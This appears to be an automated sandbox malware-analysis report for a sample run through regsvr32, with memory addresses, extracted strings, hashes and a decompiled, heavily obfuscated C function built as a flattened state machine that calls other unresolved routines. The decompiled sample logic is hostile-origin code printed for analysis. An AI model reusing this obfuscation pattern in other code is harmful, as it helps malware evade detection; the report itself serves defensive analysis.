0x04b3442e
0x04b3447a
0x04b3448e
0x04b3449f
0x04b344bf
0x04b344c4
0x00000000
0x04b344c4
0x04b34292
0x04b34311
0x04b3431d
0x04b34321
0x04b34334
0x04b3433a
0x04b34349
0x04b3435e
0x04b3437e
0x04b343a9
0x04b343b2
0x04b343b7
0x04b343ba
0x04b343c1
0x04b343ca
0x04b343c3
0x04b343c5
0x04b343c7
0x04b343c7
0x04b343e7
0x04b343ec
0x00000000
0x04b343ec
0x04b34296
0x04b342e9
0x04b342ee
0x04b342ef
0x04b342f8
0x04b342fa
0x04b342fd
0x04b34302
0x04b34306
0x04b34309
0x00000000
0x04b34309
0x04b3429a
0x00000000
0x00000000
0x04b342b9
0x04b342c2
0x04b342cc
0x04b3472c
0x04b3472c
0x04b3472c
0x00000000
0x04b34738

Strings

Vdd, xrefs: 04B3421A
zj, xrefs: 04B33F4D
sv, xrefs: 04B33A23
)<L, xrefs: 04B33591
!Sw, xrefs: 04B336F7
L, xrefs: 04B33D68
{, xrefs: 04B33570
R, xrefs: 04B33C0A
Et, xrefs: 04B33CE5
_EBM, xrefs: 04B33473
T9, xrefs: 04B33965
c, xrefs: 04B3377B
J', xrefs: 04B33627

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: 78378bf7e3cc4f4b48bcfea5b769a982631428d111743dff7bd86c9011545caa
Instruction ID: dfef2973ec23749c9cbc06bc12d69f9195868f52d79d3bdbdef6572ae5a99b49
Opcode Fuzzy Hash: 78378bf7e3cc4f4b48bcfea5b769a982631428d111743dff7bd86c9011545caa
Instruction Fuzzy Hash: F792EE711093809FE7B9CF25C58AB9FBBE1FBC4308F10891DE19A96260D7B19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B467E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B467E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_t963 = 0x21;
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = L04B34BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E04B3DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										L04B52B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											L04B4E358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												L04B4E358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E04B3ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E04B4E1F8(0x4b31a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = L04B34A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E04B4FECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E04B53E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E04B4C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E04B53E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E04B3EF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									L04B4E358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E04B510DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x04b467f8
0x04b46800
0x04b4680a
0x04b46811
0x04b46818
0x04b4681f
0x04b46826
0x04b4682d
0x04b4682e
0x04b46835
0x04b46836
0x04b4683d
0x04b46844
0x04b4684b
0x04b46852
0x04b46853
0x04b46854
0x04b46859
0x04b46861
0x04b46864
0x04b4686e
0x04b46878
0x04b46880
0x04b46882
0x04b4688d
0x04b46892
0x04b4689d
0x04b468a8
0x04b468b3
0x04b468be
0x04b468c9
0x04b468d4
0x04b468df
0x04b468ea
0x04b468f5
0x04b46900
0x04b4690b
0x04b46916
0x04b46921
0x04b4692c
0x04b46937
0x04b4693f
0x04b46944
0x04b46951
0x04b46956
0x04b46960
0x04b46965
0x04b4696b
0x04b46973
0x04b4697e
0x04b46989
0x04b46994
0x04b4699c
0x04b469a8
0x04b469ad
0x04b469b1
0x04b469b6
0x04b469c0
0x04b469cc
0x04b469d1
0x04b469d7
0x04b469e4
0x04b469e5
0x04b469e9
0x04b469f1
0x04b469fc
0x04b46a07
0x04b46a12
0x04b46a1d
0x04b46a28
0x04b46a30
0x04b46a3b
0x04b46a43
0x04b46a4b
0x04b46a53
0x04b46a5b
0x04b46a63
0x04b46a70
0x04b46a74
0x04b46a7c
0x04b46a84
0x04b46a8c
0x04b46a99
0x04b46a9d
0x04b46aa2
0x04b46aa7
0x04b46aaf
0x04b46abc
0x04b46ac0
0x04b46ac5
0x04b46aca
0x04b46ad2
0x04b46ae6
0x04b46aed
0x04b46af8
0x04b46b03
0x04b46b0b
0x04b46b13
0x04b46b18
0x04b46b20
0x04b46b28
0x04b46b30
0x04b46b38
0x04b46b42
0x04b46b46
0x04b46b4e
0x04b46b56
0x04b46b5b
0x04b46b63
0x04b46b68
0x04b46b70
0x04b46b78
0x04b46b80
0x04b46b88
0x04b46b95
0x04b46b99
0x04b46b9e
0x04b46ba6
0x04b46bae
0x04b46bb6
0x04b46bbe
0x04b46bcb
0x04b46bd4
0x04b46bd8
0x04b46be0
0x04b46bed
0x04b46bf3
0x04b46bfb
0x04b46c03
0x04b46c0b
0x04b46c13
0x04b46c1b
0x04b46c2a
0x04b46c2d
0x04b46c31
0x04b46c39
0x04b46c41
0x04b46c49
0x04b46c4e
0x04b46c56
0x04b46c5e
0x04b46c6b
0x04b46c6f
0x04b46c77
0x04b46c7f
0x04b46c8b
0x04b46c90
0x04b46c96
0x04b46c9e
0x04b46ca6
0x04b46cae
0x04b46cb6
0x04b46cbe
0x04b46cc9
0x04b46cd1
0x04b46cdc
0x04b46ce7
0x04b46cef
0x04b46cf7
0x04b46d03
0x04b46d08
0x04b46d0e
0x04b46d16
0x04b46d21
0x04b46d30
0x04b46d35
0x04b46d3e
0x04b46d49
0x04b46d5c
0x04b46d5d
0x04b46d64
0x04b46d6f
0x04b46d82
0x04b46d89
0x04b46d94
0x04b46d9f
0x04b46daa
0x04b46db5
0x04b46dc0
0x04b46dce
0x04b46dd2
0x04b46dda
0x04b46de2
0x04b46dea
0x04b46df7
0x04b46e02
0x04b46e0a
0x04b46e15
0x04b46e29
0x04b46e2e
0x04b46e37
0x04b46e42
0x04b46e4d
0x04b46e60
0x04b46e63
0x04b46e66
0x04b46e6d
0x04b46e78
0x04b46e80
0x04b46e88
0x04b46e90
0x04b46e98
0x04b46ea0
0x04b46eab
0x04b46eb3
0x04b46ebe
0x04b46ec9
0x04b46ed6
0x04b46eda
0x04b46ee2
0x04b46eea
0x04b46ef2
0x04b46efd
0x04b46f08
0x04b46f13
0x04b46f1e
0x04b46f29
0x04b46f34
0x04b46f3f
0x04b46f47
0x04b46f52
0x04b46f5d
0x04b46f68
0x04b46f70
0x04b46f7b
0x04b46f83
0x04b46f8d
0x04b46f99
0x04b46f9d
0x04b46fa5
0x04b46fb0
0x04b46fb8
0x04b46fc3
0x04b46fce
0x04b46fe1
0x04b46fe8
0x04b46ff3
0x04b47005
0x04b4700a
0x04b4701a
0x04b4701d
0x04b47024
0x04b47031
0x04b47039
0x04b47041
0x04b4704f
0x04b47054
0x04b47058
0x04b47060
0x04b4706b
0x04b47076
0x04b47081
0x04b4708c
0x04b47097
0x04b470a2
0x04b470b1
0x04b470b2
0x04b470b6
0x04b470c3
0x04b470c7
0x04b470cf
0x04b470d7
0x04b470db
0x04b470e0
0x04b470e8
0x04b470f0
0x04b470fb
0x04b47103
0x04b4710e
0x04b47119
0x04b47124
0x04b4712f
0x04b4713a
0x04b47145
0x04b47150
0x04b4715b
0x04b47166
0x04b47171
0x04b47179
0x04b47186
0x04b4718a
0x04b4718f
0x04b47197
0x04b4719f
0x04b471a7
0x04b471af
0x04b471b7
0x04b471bf
0x04b471ca
0x04b471d5
0x04b471e0
0x04b471eb
0x04b471f3
0x04b471fe
0x04b47209
0x04b4721c
0x04b47223
0x04b4722e
0x04b4723c
0x04b47240
0x04b47245
0x04b4724d
0x04b47255
0x04b4725d
0x04b47262
0x04b4726f
0x04b47273
0x04b4727b
0x04b47285
0x04b47291
0x04b47292
0x04b47296
0x04b4729e
0x04b472a6
0x04b472b1
0x04b472bc
0x04b472c7
0x04b472d2
0x04b472da
0x04b472e5
0x04b472f0
0x04b472f8
0x04b47300
0x04b47308
0x04b4730d
0x04b47315
0x04b47329
0x04b47330
0x04b4733b
0x04b47346
0x04b4734e
0x04b4735b
0x04b4735f
0x04b47367
0x04b4736f
0x04b4737a
0x04b47382
0x04b4738a
0x04b47395
0x04b473a0
0x04b473ab
0x04b473b6
0x04b473be
0x04b473c6
0x04b473ce
0x04b473d6
0x04b473de
0x04b473f1
0x04b473f8
0x04b47400
0x04b4740b
0x04b4741e
0x04b47425
0x04b4742d
0x04b47438
0x04b47443
0x04b4744e
0x04b47456
0x04b47461
0x04b47469
0x04b47476
0x04b4747a
0x04b47482
0x04b4748a
0x04b47495
0x04b474a0
0x04b474ab
0x04b474b3
0x04b474b8
0x04b474bd
0x04b474c5
0x04b474cd
0x04b474d2
0x04b474da
0x04b474e5
0x04b474f0
0x04b474f8
0x04b47503
0x04b4750a
0x04b47511
0x04b47511
0x04b47511
0x04b47516
0x04b47516
0x04b4751a
0x04b4751a
0x04b4751a
0x04b47520
0x00000000
0x00000000
0x04b47526
0x04b476ab
0x00000000
0x04b4752c
0x04b47532
0x04b47699
0x04b4769b
0x04b476a2
0x04b476a3
0x00000000
0x04b47538
0x04b4753e
0x04b47651
0x04b4765d
0x04b47672
0x04b47679
0x04b4767e
0x04b47683
0x04b47915
0x04b47915
0x04b4791c
0x00000000
0x04b47544
0x04b4754a
0x04b4761e
0x04b47623
0x00000000
0x04b47550
0x04b47556
0x04b475f0
0x04b475f5
0x04b475fa
0x04b475fc
0x04b475fc
0x00000000
0x04b4755c
0x04b47563
0x04b47921
0x04b47921
0x04b47927
0x04b47516
0x00000000
0x04b47516
0x04b47569
0x04b475b6
0x04b475bb
0x04b475c2
0x04b475c7
0x04b475d0
0x04b475d5
0x00000000
0x04b475d5
0x04b47563
0x04b47556
0x04b4754a
0x04b4753e
0x04b47532
0x04b47945
0x04b47951
0x04b47951
0x04b476b5
0x04b476b7
0x04b47772
0x04b47775
0x04b477a6
0x04b47777
0x04b47777
0x04b47783
0x04b4778a
0x04b47795
0x04b4779a
0x04b4779d
0x04b4779d
0x04b477e6
0x04b477ed
0x04b477ed
